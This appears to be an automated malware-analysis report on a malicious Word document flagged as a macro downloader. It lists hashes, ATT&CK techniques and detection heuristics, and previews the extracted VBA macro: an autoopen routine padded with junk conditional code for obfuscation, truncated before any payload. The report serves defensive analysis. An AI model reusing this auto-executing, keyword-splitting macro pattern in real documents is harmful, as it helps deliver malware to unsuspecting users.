Office (OLE) malware analysis — malicious · f9d9ce3cd4d3e6df

MALICIOUS

Office (OLE)

203.1 KB Created: 2019-04-17 11:21:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 676562ccecc48d5d32dbbe2792467349 SHA-1: 6d1e9ce76638bc2bfcae0a75b28ece5591949807 SHA-256: f9d9ce3cd4d3e6df9100b933fbb5e4fbf5cf96291248e4b5efd975efefc43817

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro uses obfuscation techniques, including splitting keywords, to hide its malicious intent. It also utilizes the GetObject function and an autoopen macro, indicating an attempt to execute code upon opening. The ClamAV detection and heuristic firings strongly suggest this is a downloader.

Heuristics 8

ClamAV: Doc.Downloader.00536d-6944297-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.00536d-6944297-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28550 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28550 bytes
SHA-256: `b4cad42e6ffc25584ff0726c421fa0c82ea1c6cbec98796cb44d3ae3dff9441a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "lQ4DxX" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "joAXZA" Attribute VB_Base = "0{6CCF1993-C999-4F57-B273-ED66A87AD96E}{5092B10A-12CB-49F0-8E07-C503D9BA76D1}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "nQAAQ_" Attribute VB_Base = "0{15E255D2-EF37-42AA-98CC-BF757E6A8AC9}{2F84DC7F-1C21-4B22-96B5-F501EE8894E0}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "skAAA44" Sub autoopen() If mBB_UkB = FABAAUxC Then NUBkAQxw = 40652062 * wAAXQwC ElseIf SAxX_AQU = hAwQGC Then Set aUUoQAA = V4_XDQ ElseIf GUAAAw = mADADQ Then oA_x_DBo = HQAkB1 / cwwQQZk * FCUAAD + Sqr(h1woQkA) ElseIf DAZ4QDA = BAcGcA Then XCCZZA = 27339839 End If If zGCAA_ = WC4GABx Then IBCAcA = 427739662 * DZ41AB ElseIf wZcBkZAw = wXZAGc_A Then Set oxAZ_cUw = KQAG4Q ElseIf CDwx4Q = iABAAZ Then KCA_Uk = WXUAABA / NXAZQUA * RGUXAU + Sqr(YA1cAAA) ElseIf VAAQAxU = QoUAQQA Then WkAoxkoD = 73589769 End If If YUAUGkAB = fZQU_CUQ Then oUAABUA = 312282061 * UZAU_C ElseIf ZUAGUGw = iwkU1ZD Then Set hGBCACDA = iDwQBB ElseIf VDcDUcD = TBDxQ_ Then XUQAwA = FxcDG1 / ACBAB1 * iBcA1kA + Sqr(NUAAAXQ) ElseIf PCUkUDGA = hoAABCA Then AxccDAA = 907020580 End If nXQ4AD If HxBAAAw = XQCDAw Then RAcQCc = 583652363 * FBGUUoUG ElseIf Q4_AAA = vQBAoADD Then Set vXAcCU = RDAoBG4 ElseIf UBUAkB = RoGUZAAA Then YAAGQwkD = BcABCocw / pAAA4BxC * kAAAAA + Sqr(EZAxkQAD) ElseIf mADkD1Ck = CCXXAU Then hAGACAkA = 767101096 End If If wDxAAAw = E_QAABB Then rCABAAC = 832649815 * GAw1oD ElseIf Z1o4G1DZ = LA44AA Then Set cUCwoA = pxoXGc ElseIf EDZwAZ = cA4xQZx Then oBBBAA = dZAAAQA1 / CAoBAC1 * lGB1xA + Sqr(VXABCC1U) ElseIf A_wDAxc = QCQAQB Then NxwAUAAB = 76026590 End If If cUZAQA1 = o1A1Qcw1 Then V__AXG = 739424599 * TAAoBAXA ElseIf JDXCABkG = zQGUBQxD Then Set zAwAQA = MABDBQQ ElseIf aXDAxA = iGAAAkkA Then TAAXABAU = tAAAA1 / GwcAUQXc * KA_AAA + Sqr(YABQA4A) ElseIf jZxQA4 = rAA_wc Then iXAAwkUw = 185960431 End If End Sub Attribute VB_Name = "jAkXXX" Function nXQ4AD() On Error Resume Next If TDCABBA = RZUUZD4D Then HZk1cAA = 111488983 * zxDwAX ElseIf lDkQZxU = i1BxABcU Then Set DcA1_G = RAAQ1AwG ElseIf SckAUA = JwAADZAC Then PDGDUDA = HxkQDAG / GA1AUG * AoQGUDB + Sqr(jAA1ABB) ElseIf pAAQAUX = WDZDx4DA Then tAA1Axk = 8828071 End If If GUcAQ1QX = qok1ABo Then IcXCAxAk = 433040459 * nDAxDAw ElseIf nGowACQx = q4wZcQCQ Then Set ZADw_AU = vD4kUA ElseIf zQGwxc = tQ4BAA Then VU4BGAUw = LQw_AD_G / hk_XQD4w * q_UUUc + Sqr(WwD_ZDQA) ElseIf lAD4_UA = Wx4AXD_D Then bQBAQw = 763825975 End If If jAZQkx4 = PcGDkAD Then NUBcAAk = 110199077 * MAcX4QQ ElseIf bBkUGA = T_ABZQQZ Then Set jAAGxAkA = pAADAA ElseIf HAoDQCAG = nAAGABAQ Then dZAx_AcA = nBAAD_ / GQAAoX * ukAwXAQ + Sqr(iABoACA) ElseIf JXUAADZ = jcw4DkA Then DUDZxXAU = 418060932 End If If 7304 < 17404 Then VABXAA = vbFalse If fGBDAcAo = Vw_BAA Then YAwA_XQA = 288468827 * F4AAAkwX ElseIf uAAwXAkQ = nZXAwGQ Then Set qXGUAx_ = BAwAwk ElseIf wB1AUU = J4AoAQA Then UZwGAwUU = WwZAA4CU / MAABCAAx * NAw_BAD + Sqr(SB_AGUw) ElseIf U1oDDkB = iU4QUw4_ Then CAUw1A = 877920435 End If If dUA4CUD = r1UAAZ_A Then wBADAAUA = 350890717 * jQAAZAQA ElseIf zxQABU = rcAGBQ4 Then Set lXBCcUA = ZAQAAAQQ ElseIf kBDUAAZU = jUAXBAAD Then ... (truncated)

SHA-256: b4cad42e6ffc25584ff0726c421fa0c82ea1c6cbec98796cb44d3ae3dff9441a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "lQ4DxX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "joAXZA"
Attribute VB_Base = "0{6CCF1993-C999-4F57-B273-ED66A87AD96E}{5092B10A-12CB-49F0-8E07-C503D9BA76D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "nQAAQ_"
Attribute VB_Base = "0{15E255D2-EF37-42AA-98CC-BF757E6A8AC9}{2F84DC7F-1C21-4B22-96B5-F501EE8894E0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "skAAA44"
Sub autoopen()
   If mBB_UkB = FABAAUxC Then
    NUBkAQxw = 40652062 * wAAXQwC
  ElseIf SAxX_AQU = hAwQGC Then
    Set aUUoQAA = V4_XDQ
  ElseIf GUAAAw = mADADQ Then
   oA_x_DBo = HQAkB1 / cwwQQZk * FCUAAD + Sqr(h1woQkA)
  ElseIf DAZ4QDA = BAcGcA Then
   XCCZZA = 27339839
End If
   If zGCAA_ = WC4GABx Then
    IBCAcA = 427739662 * DZ41AB
  ElseIf wZcBkZAw = wXZAGc_A Then
    Set oxAZ_cUw = KQAG4Q
  ElseIf CDwx4Q = iABAAZ Then
   KCA_Uk = WXUAABA / NXAZQUA * RGUXAU + Sqr(YA1cAAA)
  ElseIf VAAQAxU = QoUAQQA Then
   WkAoxkoD = 73589769
End If
   If YUAUGkAB = fZQU_CUQ Then
    oUAABUA = 312282061 * UZAU_C
  ElseIf ZUAGUGw = iwkU1ZD Then
    Set hGBCACDA = iDwQBB
  ElseIf VDcDUcD = TBDxQ_ Then
   XUQAwA = FxcDG1 / ACBAB1 * iBcA1kA + Sqr(NUAAAXQ)
  ElseIf PCUkUDGA = hoAABCA Then
   AxccDAA = 907020580
End If
nXQ4AD
   If HxBAAAw = XQCDAw Then
    RAcQCc = 583652363 * FBGUUoUG
  ElseIf Q4_AAA = vQBAoADD Then
    Set vXAcCU = RDAoBG4
  ElseIf UBUAkB = RoGUZAAA Then
   YAAGQwkD = BcABCocw / pAAA4BxC * kAAAAA + Sqr(EZAxkQAD)
  ElseIf mADkD1Ck = CCXXAU Then
   hAGACAkA = 767101096
End If
   If wDxAAAw = E_QAABB Then
    rCABAAC = 832649815 * GAw1oD
  ElseIf Z1o4G1DZ = LA44AA Then
    Set cUCwoA = pxoXGc
  ElseIf EDZwAZ = cA4xQZx Then
   oBBBAA = dZAAAQA1 / CAoBAC1 * lGB1xA + Sqr(VXABCC1U)
  ElseIf A_wDAxc = QCQAQB Then
   NxwAUAAB = 76026590
End If
   If cUZAQA1 = o1A1Qcw1 Then
    V__AXG = 739424599 * TAAoBAXA
  ElseIf JDXCABkG = zQGUBQxD Then
    Set zAwAQA = MABDBQQ
  ElseIf aXDAxA = iGAAAkkA Then
   TAAXABAU = tAAAA1 / GwcAUQXc * KA_AAA + Sqr(YABQA4A)
  ElseIf jZxQA4 = rAA_wc Then
   iXAAwkUw = 185960431
End If
End Sub

Attribute VB_Name = "jAkXXX"
Function nXQ4AD()
On Error Resume Next
   If TDCABBA = RZUUZD4D Then
    HZk1cAA = 111488983 * zxDwAX
  ElseIf lDkQZxU = i1BxABcU Then
    Set DcA1_G = RAAQ1AwG
  ElseIf SckAUA = JwAADZAC Then
   PDGDUDA = HxkQDAG / GA1AUG * AoQGUDB + Sqr(jAA1ABB)
  ElseIf pAAQAUX = WDZDx4DA Then
   tAA1Axk = 8828071
End If
   If GUcAQ1QX = qok1ABo Then
    IcXCAxAk = 433040459 * nDAxDAw
  ElseIf nGowACQx = q4wZcQCQ Then
    Set ZADw_AU = vD4kUA
  ElseIf zQGwxc = tQ4BAA Then
   VU4BGAUw = LQw_AD_G / hk_XQD4w * q_UUUc + Sqr(WwD_ZDQA)
  ElseIf lAD4_UA = Wx4AXD_D Then
   bQBAQw = 763825975
End If
   If jAZQkx4 = PcGDkAD Then
    NUBcAAk = 110199077 * MAcX4QQ
  ElseIf bBkUGA = T_ABZQQZ Then
    Set jAAGxAkA = pAADAA
  ElseIf HAoDQCAG = nAAGABAQ Then
   dZAx_AcA = nBAAD_ / GQAAoX * ukAwXAQ + Sqr(iABoACA)
  ElseIf JXUAADZ = jcw4DkA Then
   DUDZxXAU = 418060932
End If
If 7304 < 17404 Then
VABXAA = vbFalse
   If fGBDAcAo = Vw_BAA Then
    YAwA_XQA = 288468827 * F4AAAkwX
  ElseIf uAAwXAkQ = nZXAwGQ Then
    Set qXGUAx_ = BAwAwk
  ElseIf wB1AUU = J4AoAQA Then
   UZwGAwUU = WwZAA4CU / MAABCAAx * NAw_BAD + Sqr(SB_AGUw)
  ElseIf U1oDDkB = iU4QUw4_ Then
   CAUw1A = 877920435
End If
   If dUA4CUD = r1UAAZ_A Then
    wBADAAUA = 350890717 * jQAAZAQA
  ElseIf zxQABU = rcAGBQ4 Then
    Set lXBCcUA = ZAQAAAQQ
  ElseIf kBDUAAZU = jUAXBAAD Then
   
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.